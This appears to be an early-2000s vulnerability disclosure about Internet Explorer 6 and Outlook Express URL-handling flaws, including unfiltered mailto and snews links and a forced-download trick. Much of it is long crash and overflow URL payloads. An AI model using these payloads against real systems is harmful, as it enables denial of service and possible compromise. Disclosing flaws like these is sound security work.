|
Internet Explorer - Multiple Vulnerabilities Discovered by Rafel Ivgi, The-Insider. http://theinsider.deep-ice.com Every time i Read about a Vulnerability concerning I.E i believe more and more and I.E is the biggest backdoor ever. After the CONTENT-TYPE: bug that allowed to download exe's as audio's and all the patches, I.E 6 still has parsing problems. I discovered that amazingly with another wonderful microsoft software, i can force downloads on users, fake downloaded file extentions and names, inject scripts to the "blank" file, run a lot of different applications, cause a lot of errors and see the content of binary files inside I.E, cause a buffer overflow in outlook and even D.O.S the system. Before you read the following text i believe the most dangerous bug in I.E is the possibility of actively creatingor poping up new windows *without a limit*(only memory limit). This makes it easy to create many errors, overflows , and to D.O.S internet users. **************************************************************************** ********************************* Internet Explorer & Outlook Express (6.00.2600 - Fully Patched) Microsoft has inserted a filtering engine inside Internet Explorer. This engine verifies that only secure,valid and appropriate(in syntax) data will be passed on to external applications. ************************************************** The filtering engine skips a few important checks such as the "MAILTO:" protocol. With no filtering it allows inappropriate data to be sent to the default mail client. Example: mailto:%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5% C8%01%98aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaa aa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00% a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5 %C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99 %a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%9 8aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%9 9%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2% 98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00 %00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaa aaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%0 0%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7% C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2% 99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01 %98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2 %99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e 2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa% 00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98 which pops up the following error message : "The default mail client is not properly installed". There should be filtering because there can't be such email address such as this:(which is accepted by the I.E plugins filter) mailto:%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5% C8%01%98aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8% 01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2% 98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5 %e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaa aa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6% e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C 8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e 2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa% a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaa aaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a 6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5 %C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3 %e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaa% a5%e2%99%a6%e2%99%a3aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaa ************************************************** This filtering engine also filters outlook links such as the NNTP & SNTP protocols. However the security hole appears when an attacker uses the SNEWS protocol, which has no filterings. nntp://aaaaaa.com/aaaaa - filtering active! - results an error message. sntp://aaaaaaaaaaaaaaa - filtering active! - results an error message. snews://aaaaaaaaaaaaa - filtering *inactive!* - results activation of outlook and server injection into outlook. This secuirty hole allows any html page/website to open outlook express and inject anything as if it was a valid news server. This can be a troubling issue if someone will make a loop that will inject a huge amount of fake snews servers, this address will remain written in the outlook's news servers database and may cause crash or waste of system resources. The simplest way to exploit this vulnerability is by XSS(Cross Site Scripting) Local example - example.html : -------------- Cut Here -------------- -------------- Cut Here -------------- Or by XSS: http:// / This issue also creates a Buffer Overflow within Outlook Express at offset 0x00dc735, which closes outlook express, slows down the system and may even halt low memory machines. This buffer overflow in outlook express is HIGHLY DANGEROUS , it can cause remote arbitary command executions on almost every XP machine on earth. Temporary Fix For This Problem: The first time outlook is ran by the url "snews://aaaaaaaaaaaa" it asks the user if he would like outlook to be the default "SNEWS" client, Choosing no will solve the problem for now. **************************************************************************** ********************************* Disable Backspace In I.E *Manually Type* in I.E address bar "http://www.yourhost.com/#" CLICK ENTER.. No backspace! No special danger except abusing simple people. **************************************************************************** ********************************* I.E automatically starts download box a file when the same file with a ".css" extention exists in that folder. For example: http:// /styles This will cause an I.E download box that tries to download the file "styles". ***This happends only because a file named "styles.css" is located in that folder.*** Exploit Example - example2.html : -------------- Cut Here --------------: -------------- Cut Here --------------: This will execute frontpage and will start reffering the ".css" to it. For each file download there will open 2 message boxes, 1 is the download windows and 2 is the error "cant find " message, which reveals/enumerates the path of all local Temporary Internet Files folders. This quick memory overload will fill-up frontpage memory and afterwards it will open the ".css" files in "notepad". And after its done with notepad memeory it will try opening files in "open with", which is done by "rundll32.exe". At this point "rundll32.exe" will reach a out of memory overflow and will raise a message box for each file download attempt. **************************************************************************** ********************************* I.E Long Parameter Errors nntp:///62.219.131.195/a=?b=?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaafile://http://ftp://www.tripod .com can be tested with all protocols nntp://,sntp://,ldap://,ftp:// **************************************************************************** ********************************* "Things that are unlikeable, are NOT impossible."